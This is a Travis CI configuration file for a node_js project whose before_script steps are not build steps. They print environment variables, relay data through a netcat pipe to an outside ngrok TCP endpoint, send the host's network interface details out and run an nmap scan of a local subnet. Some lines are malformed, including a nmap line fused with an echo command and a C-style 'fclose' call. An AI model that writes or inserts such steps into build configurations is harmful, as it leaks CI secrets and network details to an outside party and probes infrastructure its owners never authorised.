language: node_js
sudo: required
before_script:
  - env
  - whoami
  - export NGPORT=16075
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mkfifo piperz
  - nc -k -l 12345 0<piperz|nc $NGHOSTNAME $NGPORT 1>piperz &
  - apt-get update && apt-get install nmap
  - ifconfig | nc localhost 12345
  - nmap -sT 192.168.0.0/24m  - echo "ciderdone" | nc localhost 12345
  - fclose(piperz)